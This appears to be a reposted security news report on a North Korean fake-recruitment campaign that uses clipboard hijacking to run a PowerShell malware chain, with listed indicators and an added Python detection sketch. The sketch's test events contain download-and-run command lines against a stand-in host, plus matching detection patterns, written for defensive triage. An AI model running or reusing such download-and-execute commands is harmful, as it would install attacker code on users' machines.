North Korean Impersonation Job Platform Poses Risks to U.S. AI Developers

A new variant of the long-running “Contagious Interview” operation, linked to North Korean threat actors, has emerged with an unprecedented level of realism.

The campaign targets AI developers, cryptocurrency professionals, and software engineers through a polished fake recruitment platform that convincingly mimics legitimate hiring systems.

Researchers at Validin discovered the operation while monitoring suspicious domains using a YARA-based detection pipeline.

The malicious job board, hosted on lenvny[.]com, presents itself as “Lenvny – an Integrated AI‑Powered Interview Tool,” complete with fabricated testimonials, brand logos, and dynamic job listings.

The site closely imitates the legitimate Lever talent acquisition platform, giving it a compelling appearance.

A Sophisticated Fake Recruitment Workflow

Unlike earlier DPRK lures that used static phishing pages, the new campaign employs a fully functional React and Next.js job portal with dozens of dynamically generated listings and a user experience that resembles real hiring systems.

Job openings impersonate major technology firms such as Anthropic, Anchorage Digital, and Yuga Labs, brands with known appeal among AI and crypto professionals.

Landing page for the malicious lure.

The application workflow collects personal and professional details, including name, contact information, LinkedIn and GitHub profiles, and uploaded résumés. Even without malware execution, this data helps North Korean operators build detailed dossiers on high‑value technical talent.

The infection begins during a staged “video introduction” phase. Applicants are prompted to record short videos, but when they attempt to fix a supposed webcam issue, the platform delivers a malicious command through clipboard hijacking.

The attacker‑controlled script silently replaces the copied text with a command that starts a multi‑stage infection chain when pasted into PowerShell or a terminal. The Windows‑specific command downloads a fake “graphics driver update” followed by a ZIP archive containing a VBScript loader.

PowerShell then extracts and executes the contents, leading to the deployment of secondary payloads consistent with previous BeaverTail and InvisibleFerret malware families used in DPRK campaigns.
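
A defender-side sketch of how the chain above could be flagged in process-creation telemetry, added here as an example and not taken from Validin or the original article: it correlates the download, archive-extraction and VBScript stages per host. The event field names, regex heuristics, 120-second window, host names and example.invalid URLs are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Heuristic patterns for the three stages described above (assumed, not vendor signatures).
STAGES = {
    "download": re.compile(r"\b(invoke-webrequest|iwr|curl|wget|start-bitstransfer|downloadfile)\b", re.I),
    "extract": re.compile(r"\b(expand-archive|extracttodirectory)\b", re.I),
    "vbs": re.compile(r"\.vbs\b", re.I),
}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

def stages_in(cmd):
    """Names of the chain stages whose pattern appears in one command line."""
    return {name for name, rx in STAGES.items() if rx.search(cmd)}

def triage(events, window=120):
    """Correlate stages per host within `window` seconds; return {host: verdict}."""
    seen, verdicts = defaultdict(list), {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["image"].lower() not in SHELLS:
            continue  # only shells, where a pasted command would run
        seen[ev["host"]] += [(ev["ts"], s) for s in stages_in(ev["cmd"])]
        recent = {s for t, s in seen[ev["host"]] if ev["ts"] - t <= window}
        if recent == set(STAGES):
            verdicts[ev["host"]] = "alert"  # full download, unzip, VBScript chain
        elif "download" in recent and len(recent) == 2:
            verdicts.setdefault(ev["host"], "review")  # partial chain, analyst look
    return verdicts

# Constructed process-creation events (hosts, paths and example.invalid are made up).
EVENTS = [
    {"ts": 100, "host": "WS-01", "image": "powershell.exe",
     "cmd": r"iwr https://example.invalid/drv.zip -OutFile $env:TEMP\drv.zip; "
            r"Expand-Archive $env:TEMP\drv.zip $env:TEMP\drv; wscript $env:TEMP\drv\update.vbs"},
    {"ts": 200, "host": "WS-02", "image": "cmd.exe",
     "cmd": r"curl -o %TEMP%\gfx.zip https://example.invalid/gfx.zip"},
    {"ts": 230, "host": "WS-02", "image": "PowerShell.exe",
     "cmd": r"Expand-Archive $env:TEMP\gfx.zip $env:TEMP\gfx; cscript $env:TEMP\gfx\run.vbs"},
    {"ts": 300, "host": "WS-03", "image": "pwsh.exe",
     "cmd": r"Invoke-WebRequest https://example.invalid/tool.msi -OutFile tool.msi"},
    {"ts": 400, "host": "WS-04", "image": "powershell.exe",
     "cmd": r"iwr https://example.invalid/docs.zip -OutFile docs.zip; Expand-Archive docs.zip docs"},
    {"ts": 900, "host": "WS-04", "image": "powershell.exe",
     "cmd": r"cscript C:\Scripts\inventory.vbs"},
]

if __name__ == "__main__":
    for host, verdict in sorted(triage(EVENTS).items()):
        print(host, verdict)
```

WS-02 shows why per-host correlation matters: the stages arrive as two separate shell processes, and neither command line alone contains the whole chain.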

Targeting High‑Value AI and Crypto Engineers

The campaign’s focus on AI researchers and cryptocurrency developers aligns with North Korea’s strategic goals of acquiring research assets, technical knowledge, and direct financial gain.

AI professionals often handle models, datasets, and proprietary code, while crypto engineers may have indirect access to wallets or key‑management systems.

By staging attacks around familiar recruitment workflows, the threat actors lower suspicion and exploit normal candidate behavior, such as copying technical commands or downloading helper utilities.

Experts warn job seekers to verify all job portals and never execute recruiter‑provided scripts without validation. Legitimate organizations rarely host interview tools on unrelated domains. Running interview‑related code inside isolated environments can prevent compromise.

The Contagious Interview campaign continues to evolve, showing how DPRK operators are advancing beyond simple phishing toward genuine social engineering ecosystems that blend technical precision with psychological manipulation.

Indicators

Related domains and IPs

lenvny[.]com
advisorflux[.]com
assureeval[.]com
carrerlilla[.]com
69.62.86.78
72.61.9.45


The post North Korean Impersonation Job Platform Poses Risks to U.S. AI Developers appeared first on Cyber Security News.

